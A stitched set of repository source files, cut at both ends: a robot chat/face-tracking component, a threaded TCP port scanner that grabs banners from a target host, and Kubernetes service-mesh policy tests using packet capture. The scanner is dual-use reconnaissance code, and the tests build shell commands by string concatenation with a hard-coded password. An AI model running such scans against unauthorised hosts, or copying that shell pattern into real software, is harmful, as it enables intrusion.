Thread(target=self.on_chat_enter, args=(closest_face.name,)).start()
self._face_vectors.clear()
# Else, when conversation times out
elif time() - self._conversation_time >= self.CONVERSATION_TIMEOUT:
# If another Person enters conversation at this point -> Start Conversation with them
if len(closest_people) == 1:
closest_person = closest_people[0]
closest_face = get_face(closest_person, self._face_info)
if closest_face:
self._conversation_time = time()
Thread(target=self.on_chat_enter, args=(closest_face.name,)).start()
self._face_vectors.clear()
# If Group enters conversation at this point -> Start Conversation with them
if len(closest_people) >= 2:
self._conversation_time = time()
Thread(target=self.on_chat_enter, args=(config.HUMAN_CROWD,)).start()
self._face_vectors.clear()
else:
self.on_chat_exit()
self._face_vectors.clear()
# Wipe face and people info after use
self._face_info = []
self._people_info = []
def on_object(image, objects):
self._people_info = [obj for obj in objects if obj.name == "person"]
self.context.add_objects(objects)
def on_face(people):
self._face_info = people
self.context.add_people(people)
# Link Transcript, Object and Face Events to Context
speech_comp.on_transcript_callbacks.append(on_transcript)
object_comp.on_object_callbacks.append(on_object)
face_comp.on_face_callbacks.append(on_face)
# Add On Image Callback
self.backend.camera.callbacks.append(on_image)
@property
def context(self):
# type: () -> Context
"""
Returns
-------
context: Context
Current Context
"""
return self._context
@property
def face_vectors(self):
# type: () -> Deque[np.ndarray]
return self._face_vectors
def say(self, text, animation=None, block=False):
# Call super (TextToSpeechComponent)
super(ContextComponent, self).say(text, animation, block)
# Add Utterance to Chat
if self.context.chatting:
self.context.chat.add_utterance([UtteranceHypothesis(text, 1)], me=True)
def on_chat_turn(self, utterance):
# type: (Utterance) -> None
"""
On Chat Turn Callback, called every time the speaker utters some Utterance
Parameters
----------
utterance: Utterance
Utterance speaker uttered
"""
pass
def on_chat_enter(self, person):
pass
def on_chat_exit(self):
pass
|
portscanner.py
|
# -*- coding: utf-8 -*-
import optparse
from socket import *
from threading import *
screenLock = Semaphore(value=1)
def connScan(tgtHost, tgtPort):
try:
connSkt = socket(AF_INET, SOCK_STREAM)
connSkt.connect((tgtHost, tgtPort))
connSkt.send(b'ViolentPython\r\n')
results = connSkt.recv(100)
screenLock.acquire()
print('[+] %d/tcp open' % tgtPort)
print('[+] ' + str(results))
except Exception:
screenLock.acquire()
print('[-] %d/tcp closed' % tgtPort)
finally:
screenLock.release()
connSkt.close()
def portScan(tgtHost, tgtPorts):
try:
tgtIp = gethostbyname(tgtHost)
except Exception:
print("[-] Cannot resolve '%s': Unknown host" % tgtHost)
return
try:
tgtName = gethostbyaddr(tgtIp)
print('\n[+] Scan Results for: ' + tgtName[0])
except Exception:
print('\n[+] Scan Results for: ' + tgtIp)
setdefaulttimeout(1)
for tgtPort in tgtPorts:
t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
t.start()
def main():
parser = optparse.OptionParser("usage%prog " + "-H <target host> -p <target port>")
parser.add_option('-H',dest = 'tgtHost',type='string', help='specify target host')
parser.add_option('-p',dest = 'tgtPort',type='string', help='specify target port[s] separated by comma')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if (tgtHost == None) and (tgtPorts[0] == None):
print '[-] You must specify a target host and port[s].'
exit(0)
portScan(tgtHost,tgtPorts)
if __name__ == '__main__':
main()
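# Example invocation (illustrative host/ports; scan only machines you own):
#     python portscanner.py -H 192.168.1.10 -p 21,22,80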
|
tests.py
|
###############################################################################
# Imports
import sys # Exit function
import os # OS functions
import argparse # Argument parser
import pprint # Pretty printing dicts
# Shell commands
import subprocess
from subprocess import Popen,PIPE
import shlex # Shell command parsing
from multiprocessing import Process, Lock # Parallel execution
from ast import literal_eval # String to dictionary
import re # Regular expressions
from scapy.all import * # Packet capture parsing
###############################################################################
# General utility and variables
contexts = ["owner", "vfx", "color", "sound", "hdr"] # workflow contexts
services = ["owner", "vfx1", "vfx2", "vfx3", "color", "sound", "hdr"] # workflow services
request_types = ["GET", "POST"] # possible requests available
interfaces = ["lo", "eth0"] # possible interfaces to capture on
# Exit the program
def terminate_app(code):
print("Exiting program...")
sys.exit(code)
# Returns pods available in a given context
def get_pods(context):
get_pods = shlex.split("kubectl --context {} get pods -o wide".format(context))
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, get_pods))))
get_pods_p = Popen(get_pods,
stdout=subprocess.PIPE,
universal_newlines=True)
tr = shlex.split("tr -s ' '")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, tr))))
tr_p = Popen(tr,
stdin=get_pods_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
get_pods_p.stdout.close()
stdout = tr_p.communicate()
if args.verbose >= 2:
print(stdout)
stdout_pods = stdout[0].split('\n')[1:-1]
pods = []
for line in stdout_pods:
if args.verbose >= 2:
print("Line: {}".format(line))
pod_id = line.split()[0]
pod_name = pod_id.split('-v1')[0]
pods.append(pod_name)
if args.verbose >= 2:
print(pods)
return pods
# Returns a pod from a list of pods and a name
def get_pod(pods, name):
return_pod = Pod()
for pod in pods:
if pod.name == name:
return_pod = pod
break
assert(return_pod.name != ""), "Pod " + name + " does not exist."
return return_pod
###############################################################################
# Argument parser
def get_parser():
# Get parser for command line arguments
parser = argparse.ArgumentParser(description="Tests for secure architecture")
parser.add_argument("--version", action="version", version='%(prog)s 1.0')
parser.add_argument("-v", "--verbose", action="count", default=0, help="increase output verbosity")
parser.add_argument("-n", "--no-capture", action="store_true", help="do not capture")
parser.add_argument("-p", "--policy-file", type=str, metavar="FILE", default="../service-mesh/policy.yaml", help="policy file for capture checking")
parser.add_argument("-d", "--capture-dir", type=str, metavar="DIR", default="packet_captures/", help="packet capture folder")
parser.add_argument("-o", "--override-pods", type=str, metavar="NAME:IP...", default="", help="override pod IP addresses")
return parser
###############################################################################
# Pod object
class Pod:
def __init__(self, name=None, context=None):
# Dummy pod for error handling
if name is None:
self.name = ""
self.context = ""
self.pod_id = ""
self.pod_ip = ""
self.service_ip = ""
self.service_port = ""
else:
self.name = name
self.context = context
assert(self.context != None), "Pod " + name + " has no context."
self.pod_id = self.get_pod_id(name, context)
assert(self.pod_id != ""), "Pod " + name + " does not exist."
self.pod_ip = self.get_pod_ip(name, context)
assert(self.pod_ip != ""), "Pod " + name + " has no IP."
self.service_ip = self.get_service_ip(name, context)
assert(self.service_ip != ""), "Pod " + name + " has no service IP."
self.service_port = self.get_service_port(name, context)
assert(self.service_port != ""), "Pod " + name + " has no service port."
def __repr__(self):
return "Pod({}, {}, {}, {}, {}, {})".format(self.name, self.context, self.pod_id, self.pod_ip, self.service_ip, self.service_port)
# Returns the pod ID
def get_pod_id(self, name, context):
get_pods = shlex.split("kubectl --context {} get pods".format(context))
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, get_pods))))
get_pods_p = Popen(get_pods,
stdout=subprocess.PIPE,
universal_newlines=True)
grep = shlex.split("grep " + name)
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, grep))))
grep_p = Popen(grep,
stdin=get_pods_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
get_pods_p.stdout.close()
tr = shlex.split("tr -s ' '")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, tr))))
tr_p = Popen(tr,
stdin=grep_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
grep_p.stdout.close()
cut = shlex.split("cut -d ' ' -f 1")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, cut))))
cut_p = Popen(cut,
stdin=tr_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
tr_p.stdout.close()
awk = shlex.split("awk 'NR>1{print PREV} {PREV=$0} END{printf(\"%s\",$0)}'")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, awk))))
awk_p = Popen(awk,
stdin=cut_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
cut_p.stdout.close()
output = awk_p.communicate()[0]
if args.verbose >= 1:
print("Pod '" + name + "' ID: " + output)
return output
# Returns the pod IP
def get_pod_ip(self, name, context):
get_pods = shlex.split("kubectl --context {} get pods -o wide".format(context))
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, get_pods))))
get_pods_p = Popen(get_pods,
stdout=subprocess.PIPE,
universal_newlines=True)
grep = shlex.split("grep " + name)
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, grep))))
grep_p = Popen(grep,
stdin=get_pods_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
get_pods_p.stdout.close()
tr = shlex.split("tr -s ' '")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, tr))))
tr_p = Popen(tr,
stdin=grep_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
grep_p.stdout.close()
cut = shlex.split("cut -d ' ' -f 6")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, cut))))
cut_p = Popen(cut,
stdin=tr_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
tr_p.stdout.close()
awk = shlex.split("awk 'NR>1{print PREV} {PREV=$0} END{printf(\"%s\",$0)}'")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, awk))))
awk_p = Popen(awk,
stdin=cut_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
cut_p.stdout.close()
output = awk_p.communicate()[0]
if args.verbose >= 1:
print("Pod '" + name + "' IP: " + output)
return output
# Returns the IP of the service
def get_service_ip(self, name, context):
# kubectl get services | grep "adder" | tr -s ' ' | cut -d ' ' -f 5 | cut -d '/' -f 1
get_services = shlex.split("kubectl --context {} get services".format(context))
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, get_services))))
get_services_p = Popen(get_services,
stdout=subprocess.PIPE,
universal_newlines=True)
grep = shlex.split("grep " + name)
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, grep))))
grep_p = Popen(grep,
stdin=get_services_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
get_services_p.stdout.close()
tr = shlex.split("tr -s ' '")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, tr))))
tr_p = Popen(tr,
stdin=grep_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
grep_p.stdout.close()
cut = shlex.split("cut -d ' ' -f 3")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, cut))))
cut_p = Popen(cut,
stdin=tr_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
tr_p.stdout.close()
awk = shlex.split("awk 'NR>1{print PREV} {PREV=$0} END{printf(\"%s\",$0)}'")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, awk))))
awk_p = Popen(awk,
stdin=cut_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
cut_p.stdout.close()
output = awk_p.communicate()[0]
if args.verbose >= 1:
print("Pod '" + name + "' service IP: " + output)
return output
# Returns the port number of the service
def get_service_port(self, name, context):
# kubectl get services | grep "adder" | tr -s ' ' | cut -d ' ' -f 5 | cut -d '/' -f 1
get_services = shlex.split("kubectl --context {} get services".format(context))
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, get_services))))
get_services_p = Popen(get_services,
stdout=subprocess.PIPE,
universal_newlines=True)
grep = shlex.split("grep " + name)
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, grep))))
grep_p = Popen(grep,
stdin=get_services_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
get_services_p.stdout.close()
tr = shlex.split("tr -s ' '")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, tr))))
tr_p = Popen(tr,
stdin=grep_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
grep_p.stdout.close()
cut = shlex.split("cut -d ' ' -f 5")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, cut))))
cut_p = Popen(cut,
stdin=tr_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
tr_p.stdout.close()
second_cut = shlex.split("cut -d '/' -f 1")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, second_cut))))
second_cut_p = Popen(second_cut,
stdin=cut_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
cut_p.stdout.close()
awk = shlex.split("awk 'NR>1{print PREV} {PREV=$0} END{printf(\"%s\",$0)}'")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, awk))))
awk_p = Popen(awk,
stdin=second_cut_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
second_cut_p.stdout.close()
output = awk_p.communicate()[0]
if args.verbose >= 1:
print("Pod '" + name + "' service port: " + output)
return output
###############################################################################
# Test utility
# Call subprocess to execute shell command contained in inp
def subprocess_call(inp, lock=None):
command = shlex.split(inp)
if args.verbose >= 1:
if lock is not None:
lock.acquire()
try:
print("Command: [{}]".format(", ".join(map(str, command))))
finally:
lock.release()
else:
print("Command: [{}]".format(", ".join(map(str, command))))
process = subprocess.run(command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True)
output = process.stdout
if lock is not None:
lock.acquire()
try:
if args.verbose >= 2:
print(output)
finally:
lock.release()
else:
if args.verbose >= 2:
print(output)
return output
# Call subprocess to execute shell command contained in inp, uses custom shell
def subprocess_shell_call(inp, lock=None):
if args.verbose >= 1:
if lock is not None:
lock.acquire()
try:
print("Command: [{}]".format(shlex.split("".join(map(str, inp)))))
finally:
lock.release()
else:
print("Command: [{}]".format(shlex.split("".join(map(str, inp)))))
process = subprocess.run(inp,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
shell=True)
output = process.stdout
if lock is not None:
lock.acquire()
try:
if args.verbose >= 2:
print(output)
finally:
lock.release()
else:
if args.verbose >= 2:
print(output)
return output
# Call subprocess to execute sleep command contained in inp
# The only difference from 'subprocess_call' is that a message is printed before running the command
def sleep_call(inp, lock=None):
command = shlex.split(inp)
if args.verbose >= 1:
if lock is not None:
lock.acquire()
try:
print("Command: [{}]".format(", ".join(map(str, command))))
finally:
lock.release()
else:
print("Command: [{}]".format(", ".join(map(str, command))))
if lock is not None:
lock.acquire()
try:
if args.verbose >= 2:
print("Sleeping for " + command[-1] + " seconds...")
finally:
lock.release()
else:
if args.verbose >= 2:
print("Sleeping for " + command[-1] + " seconds...")
process = subprocess.run(command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True)
output = process.stdout
return output
# Sends request from src to dst with the specified request_type
def request(src, dst, request_type, lock):
# Sleep for 2 seconds so the capture is running before the request is sent
sleep_call("sleep 2", lock)
# While the capture is running, send the request from src to dst
if request_type == "GET":
subprocess_shell_call("kubectl --context " + src.context + " exec -it " + src.pod_id + " -c " + src.name + " -- curl --user " + src.name + ":password -X GET --header 'Accept: application/json' 'http://" + dst.service_ip + ":" + dst.service_port + "/api/" + dst.name + "' -v", lock)
else: # POST request
subprocess_shell_call("kubectl --context " + src.context + " exec -it " + src.pod_id + " -c " + src.name + " -- curl --user " + src.name + ":password -X POST --header 'Content-Type: application/json' --header 'Accept: text/html' -d '{ \"document\": \"Contents of the document\", \"document_name\": \"file_name_to_save\" }' 'http://" + dst.service_ip + ":" + dst.service_port + "/api/" + dst.name + "' -v", lock)
# Launches a packet capture, a request and fetches the capture file
# src, dst and capture_pod are Pod()
def request_capture(src, dst, request_type, capture_pod, interface): #TODO Fix parallel display
# Set filename for packet capture
capture_file = args.capture_dir + src.name + "-" + dst.name + "-" + request_type + "-" + capture_pod.name + "-" + interface + ".pcap"
# Lock for parallel processing access to output
lock = Lock()
# Start capturing on the requested interface of the tcpdump container of the capture pod
# -G SECONDS -W 1 : Run for SECONDS seconds
# -w FILE : specify the dump file
# -i INTERFACE : specify the interface
capture_p = Process(target=subprocess_shell_call, args=("kubectl --context " + capture_pod.context + " exec -it " + capture_pod.pod_id + " -c tcpdump -- tcpdump -G 5 -W 1 -w /tmp/capture.pcap -i " + interface, lock))
# Sends request
request_p = Process(target=request, args=(src, dst, request_type, lock))
# Start parallel capture and request
capture_p.start()
request_p.start()
# Wait for both processes
capture_p.join()
request_p.join()
# Copy capture to host machine
subprocess_shell_call("kubectl --context " + capture_pod.context + " cp " + capture_pod.pod_id + ":/tmp/capture.pcap -c tcpdump " + capture_file)
# Identify the capture to determine what to look for
# src.lo and dst.lo should display HTTP
# src.eth0 and dst.eth0 should display TLS
# bystander.lo and bystander.eth0 should display nothing
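# For example (illustrative, using the filename convention built in
# request_capture above): a file named
#     packet_captures/owner-vfx1-GET-owner-lo.pcap
# is identified as "SRC_LO", while
#     packet_captures/owner-vfx1-GET-color-eth0.pcap
# is identified as "BYSTANDER_ETH0". Note that this parsing assumes pod names
# themselves contain no '-'.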
def id_capture(capture):
# Unpack items
capture_items = capture.split('.')[0].split('/')[-1].split('-')
capture_src, capture_dst, capture_request_type, capture_pod, interface = capture_items
if args.verbose >= 2:
print(capture_src, capture_dst, capture_request_type, capture_pod, interface)
# Return variable
return_code = ""
if capture_pod == capture_src and interface == "lo":
return_code = "SRC_LO"
elif capture_pod == capture_dst and interface == "lo":
return_code = "DST_LO"
elif capture_pod == capture_src and interface == "eth0":
return_code = "SRC_ETH0"
elif capture_pod == capture_dst and interface == "eth0":
return_code = "DST_ETH0"
elif capture_pod != capture_src and capture_pod != capture_dst and interface == "lo":
return_code = "BYSTANDER_LO"
elif capture_pod != capture_src and capture_pod != capture_dst and interface == "eth0":
return_code = "BYSTANDER_ETH0"
assert(return_code != ""), "The identity of capture " + capture + " could not be established."
if args.verbose >= 1:
print("Capture " + capture + ": " + return_code)
return return_code
# According to the capture and the ID, check if policy is enforced
def check_capture(capture, capture_id, authorization, pods):
# Capture does not exist
if not os.path.isfile(capture):
print('"{}" does not exist'.format(capture), file=sys.stderr)
terminate_app(-1)
# Unpack items from capture filename
capture_items = capture.split('.')[0].split('/')[-1].split('-')
capture_src, capture_dst, capture_request_type, capture_pod, interface = capture_items
capture_src_pod = get_pod(pods, capture_src)
capture_dst_pod = get_pod(pods, capture_dst)
capture_cap_pod = get_pod(pods, capture_pod)
if args.verbose >= 2:
print(capture_src, capture_dst, capture_request_type, capture_pod, interface)
# Open capture file with scapy
if args.verbose >= 1:
print("Opening {}...".format(capture))
scapy_capture = rdpcap(capture)
# Get sessions
sessions = scapy_capture.sessions()
if args.verbose >= 1:
pprint.pprint(sessions)
# Capturing was done on the source loopback
if capture_id == "SRC_LO":
# Flags for finding relevant sessions
found_src_dst_flow = False
found_dst_src_flow = False
# Error handling
found_request_type = False
# Return value
return_check = ""
# Find the relevant sessions in the capture
for session in sessions:
if args.verbose >= 1:
print(session)
# Unpack items from session
session_chunks = session.split(' ')
session_src = session_chunks[1]
session_dst = session_chunks[3]
# Relevant session: Source -> Destination
if session_src.split(':')[0] == capture_src_pod.pod_ip and session_dst == "127.0.0.1:15001":
# Found relevant session from source to destination
found_src_dst_flow = True
if args.verbose >= 2:
print("Found SRC -> DST")
for packet in sessions[session]:
if Raw in packet:
# Extract HTTP payload
payload = packet[Raw].load.decode()
if args.verbose >= 2:
print(payload)
# Check request type is consistent with expectations
if capture_request_type in payload:
found_request_type = True
# Request type was not consistent with expectations
if not found_request_type:
raise ValueError("Capture " + capture + ": Request type " + capture_request_type + " inconsistent with expectations.")
# Relevant session: Destination -> Source
elif session_src == capture_dst_pod.service_ip + ':' + capture_dst_pod.service_port and session_dst.split(':')[0] == capture_src_pod.pod_ip:
# Found relevant session from destination to source
found_dst_src_flow = True
if args.verbose >= 2:
print("Found DST -> SRC")
for packet in sessions[session]:
if Raw in packet:
# Extract HTTP payload
payload = packet[Raw].load.decode()
if args.verbose >= 2:
print(payload)
# Check response type
response_type = payload.splitlines()[0]
if args.verbose >= 2:
print("Capture response type: " + response_type)
# The request was a GET
if capture_request_type == "GET":
# Request was authorized
if response_type == "HTTP/1.1 200 OK":
if args.verbose >= 2:
print("Request was allowed.")
if authorization == "allow":
return_check = "OK"
else:
return_check = "KO"
# Request was denied
elif response_type == "HTTP/1.1 403 Forbidden":
if args.verbose >= 2:
print("Request was denied.")
if authorization == "deny":
return_check = "OK"
else:
return_check = "KO"
# The request was a POST
elif capture_request_type == "POST":
# Request was authorized
if response_type == "HTTP/1.1 201 Created":
if args.verbose >= 2:
print("Request was allowed.")
if authorization == "allow":
return_check = "OK"
else:
return_check = "KO"
# Request was denied
elif response_type == "HTTP/1.1 403 Forbidden":
if args.verbose >= 2:
print("Request was denied.")
if authorization == "deny":
return_check = "OK"
else:
return_check = "KO"
else:
raise ValueError("Capture " + capture + ": Unrecognized response type " + response_type + ".")
# No relevant session found
if not found_src_dst_flow or not found_dst_src_flow:
raise ValueError("Capture " + capture + ": Missing matching session.")
# TODO: Make the tests more fine-grained to report whether both sessions or only one are missing
assert(return_check != ""), "Return check was never determined."
return return_check
# Capturing was done on the destination loopback
elif capture_id == "DST_LO" and authorization == "allow":
# Flags for finding relevant sessions
found_src_dst_flow = False
found_dst_src_flow = False
# Error handling
found_request_type = False
# Return value
return_check = ""
# Find the relevant sessions in the capture
for session in sessions:
if args.verbose >= 1:
print(session)
# Unpack items from session
session_chunks = session.split(' ')
session_src = session_chunks[1]
session_dst = session_chunks[3]
# Relevant session: Source -> Destination
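# On the destination pod, the sidecar forwards the decrypted request to the application
# over loopback on the service port, so both endpoints appear as 127.0.0.1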
if session_src.split(':')[0] == "127.0.0.1" and session_dst == "127.0.0.1:" + capture_dst_pod.service_port:
# Found relevant session from source to destination
found_src_dst_flow = True
if args.verbose >= 2:
print("Found SRC -> DST")
for packet in sessions[session]:
if Raw in packet:
# Extract HTTP payload
payload = packet[Raw].load.decode()
if args.verbose >= 2:
print(payload)
# Check request type is consistent with expectations
if capture_request_type in payload:
found_request_type = True
# Request type was not consistent with expectations
if not found_request_type:
raise ValueError("Capture " + capture + ": Request type " + capture_request_type + " inconsistent with expectations.")
# Relevant session: Destination -> Source
elif session_src == "127.0.0.1:" + capture_dst_pod.service_port and session_dst.split(':')[0] == "127.0.0.1":
# Found relevant session from destination to source
found_dst_src_flow = True
if args.verbose >= 2:
print("Found DST -> SRC")
for packet in sessions[session]:
if Raw in packet:
# Extract HTTP payload
payload = packet[Raw].load.decode()
if args.verbose >= 2:
print(payload)
# Check response type
response_type = payload.splitlines()[0]
if args.verbose >= 2:
print("Capture response type: " + response_type)
# The request was a GET
if capture_request_type == "GET":
# Request was authorized
if response_type == "HTTP/1.0 200 OK":
if args.verbose >= 2:
print("Request was allowed.")
if authorization == "allow":
return_check = "OK"
else:
return_check = "KO"
# Request was denied
elif response_type == "HTTP/1.1 403 Forbidden":
if args.verbose >= 2:
print("Request was denied.")
if authorization == "deny":
return_check = "OK"
else:
return_check = "KO"
# The request was a POST
elif capture_request_type == "POST":
# Request was authorized
if response_type == "HTTP/1.0 201 CREATED":
if args.verbose >= 2:
print("Request was allowed.")
if authorization == "allow":
return_check = "OK"
else:
return_check = "KO"
# Request was denied
elif response_type == "HTTP/1.1 403 Forbidden":
if args.verbose >= 2:
print("Request was denied.")
if authorization == "deny":
return_check = "OK"
else:
return_check = "KO"
else:
raise ValueError("Capture " + capture + ": Unrecognized response type " + response_type + ".")
# No relevant session found
if not found_src_dst_flow or not found_dst_src_flow:
raise ValueError("Capture " + capture + ": Missing matching session.")
# TODO: Make the tests more fine-grained to report whether both sessions or only one are missing
assert(return_check != ""), "Return check was never determined."
return return_check
# Capturing was done on the source/destination external interface
elif capture_id == "SRC_ETH0" or capture_id == "DST_ETH0":
# Flags for finding relevant sessions
found_src_dst_flow = False
found_dst_src_flow = False
found_cleartext = False
# Return value
return_check = ""
# Find the relevant sessions in the capture
for session in sessions:
if args.verbose >= 1:
print(session)
# Unpack items from session
session_chunks = session.split(' ')
session_src = session_chunks[1]
session_dst = session_chunks[3]
# Relevant session: Source -> Destination
if session_src.split(':')[0] == capture_src_pod.pod_ip and session_dst == capture_dst_pod.pod_ip + ':' + capture_dst_pod.service_port:
# Found relevant session from source to destination
found_src_dst_flow = True
if args.verbose >= 2:
print("Found SRC -> DST")
for packet in sessions[session]:
if Raw in packet:
try:
payload = packet[Raw].load.decode()
found_cleartext = True
except UnicodeDecodeError:
if args.verbose >= 2:
print("No cleartext here...")
if found_cleartext:
return_check = "KO"
else:
return_check = "OK"
# Relevant session: Destination -> Source
elif session_src == capture_dst_pod.pod_ip + ':' + capture_dst_pod.service_port and session_dst.split(':')[0] == capture_src_pod.pod_ip:
# Found relevant session from destination to source
found_dst_src_flow = True
if args.verbose >= 2:
print("Found DST -> SRC")
for packet in sessions[session]:
if Raw in packet:
try:
payload = packet[Raw].load.decode()
found_cleartext = True
except UnicodeDecodeError:
if args.verbose >= 2:
print("No cleartext here...")
if found_cleartext:
return_check = "KO"
else:
return_check = "OK"
# No relevant session found
if not found_src_dst_flow or not found_dst_src_flow:
raise ValueError("Capture " + capture + ": Missing matching session.")
# TODO: Make the tests more fine-grained to report whether both sessions or only one are missing
assert(return_check != ""), "Return check was never determined."
return return_check
# Capturing was done on a bystander or capturing was done on the destination loopback and the policy is "deny"
elif capture_id == "BYSTANDER_LO" or capture_id == "BYSTANDER_ETH0" or (capture_id == "DST_LO" and authorization == "deny"):
# Flags for finding relevant sessions
found_src_dst_flow = False
found_dst_src_flow = False
# Return value
return_check = ""
# Find the relevant sessions in the capture
for session in sessions:
if args.verbose >= 1:
print(session)
# Unpack items from session
session_chunks = session.split(' ')
session_src = session_chunks[1]
session_dst = session_chunks[3]
# Relevant session: Source -> Destination
if session_src.split(':')[0] == capture_src_pod.pod_ip and session_dst == capture_dst_pod.pod_ip + ':' + capture_dst_pod.service_port:
# Found relevant session from source to destination
found_src_dst_flow = True
if args.verbose >= 2:
print("Found SRC -> DST")
# Relevant session: Destination -> Source
elif session_src == capture_dst_pod.pod_ip + ':' + capture_dst_pod.service_port and session_dst.split(':')[0] == capture_src_pod.pod_ip:
# Found relevant session from destination to source
found_dst_src_flow = True
if args.verbose >= 2:
print("Found DST -> SRC")
# No relevant session found
if not found_src_dst_flow and not found_dst_src_flow:
return_check = "OK"
else:
return_check = "KO"
assert(return_check != ""), "Return check was never determined."
return return_check
else:
raise ValueError("Capture " + capture + ": Capture ID " + capture_id + " not valid.")
###############################################################################
# Main
#TODO Python doc string
if __name__ == "__main__":
print("\n\n###############################################################################")
print("Getting arguments")
print("###############################################################################")
# Create a parser
parser = get_parser()
# Parse arguments
args = parser.parse_args()
print(args)
print("\n\n###############################################################################")
print("Creating pod objects")
print("###############################################################################")
# Create pod objects
pods = []
for context in contexts:
context_pods = get_pods(context)
for pod in context_pods:
pods.append(Pod(pod, context))
for pod in pods:
print(pod)
if args.override_pods:
pod_ip_overrides = [i.split(':') for i in args.override_pods.split(", ")]
for override_pod, override_ip in pod_ip_overrides:
for pod in pods:
if pod.name == override_pod:
pod.pod_ip = override_ip
if args.no_capture:
with open("capture-metadata.dat") as capture_metadata:
for line in capture_metadata:
pod_chunks = line.split(')')[0].split('(')[-1].split(", ")
for pod in pods:
if pod.name == pod_chunks[0]:
pod.pod_ip = pod_chunks[2]
print("\n\n###############################################################################")
print("Capturing requests")
print("###############################################################################")
# Create capture dir
if not os.path.exists(args.capture_dir):
os.makedirs(args.capture_dir)
print("Created {}".format(args.capture_dir))
# Packet capture
if not args.no_capture:
# Capture metadata file
with open("capture-metadata.dat", "w+") as capture_metadata:
for pod in pods:
capture_metadata.write(repr(pod))
capture_metadata.write("\n")
# For each possible communication, capture on each possible interface
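# This yields one pcap per (src, dst, request_type, capture_pod, interface) combination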
print("Capturing packets...")
for src in pods:
for dst in pods:
if src != dst:
for request_type in request_types:
for capture_pod in pods:
for interface in interfaces:
request_capture(src, dst, request_type, capture_pod, interface)
terminate_app(0)
print("\n\n###############################################################################")
print("Constructing AC matrix")
print("###############################################################################")
# Fetch policy from YAML configuration file and store it in policy
with open(args.policy_file) as policy_file:
# Isolate the opa-policy section
policy = policy_file.read().split("name: opa-policy")[-1]
if args.verbose >= 1:
print(policy)
# Get the default allow policy
default_allow = ""
for line in policy.split('\n'):
if "default allow" in line:
default_allow = line.split('=')[1].strip()
assert(default_allow != ""), "A default policy must be defined."
if args.verbose >= 1:
print("default allow = " + default_allow)
# Fill authorized_comms with the default policy
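# authorized_comms[src_pod][dst_pod][request_type] maps to "allow" or "deny"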
if default_allow == "true":
authorized_comms = {src: {dst: {request_type: "allow" for request_type in request_types} for dst in pods if src != dst} for src in pods}
else:
authorized_comms = {src: {dst: {request_type: "deny" for request_type in request_types} for dst in pods if src != dst} for src in pods}
# Get role permissions from policy as a dictionary
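# Expected shape (names illustrative): {"some_src": [{"method": "GET", "path": ".../some_dst"}, ...]}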
role_perms = literal_eval(policy.split("role_perms = ")[1])
if args.verbose >= 1:
pprint.pprint(role_perms)
# According to the rest of the policy, change authorized_comms values needing change
for src in role_perms:
for comm in role_perms[src]:
dst = comm["path"].split('/')[-1]
request_type = comm["method"]
if args.verbose >= 1:
print("Modifying permission: " + src, dst, request_type)
authorized_comms[get_pod(pods, src)][get_pod(pods, dst)][request_type] = "allow"
if args.verbose >= 1:
pprint.pprint(authorized_comms)
print("\n\n###############################################################################")
print("Checking captures with AC matrix")
print("###############################################################################")
# Check capture files to confirm or refute that the policy is enforced
# For each possible communication in authorized_comms,
# get all the relevant packet captures
for src in authorized_comms:
for dst in authorized_comms[src]:
for request_type in authorized_comms[src][dst]:
# Pattern to match
pattern = src.name + "-" + dst.name + "-" + request_type + r".*\.pcap"
if args.verbose >= 1:
print(pattern)
# Captures like: "{src}-{dst}-{request_type}*.pcap"
captures = [args.capture_dir + capture for capture in os.listdir(args.capture_dir) if re.match(pattern, capture)]
if args.verbose >= 2:
print(captures)
print("{:10s} {:11s} {:4s} {:14s} {:6s} {}".format("SOURCE", "DESTINATION", "TYPE", "CAPTURE", "POLICY", "CHECK"))
for capture in captures:
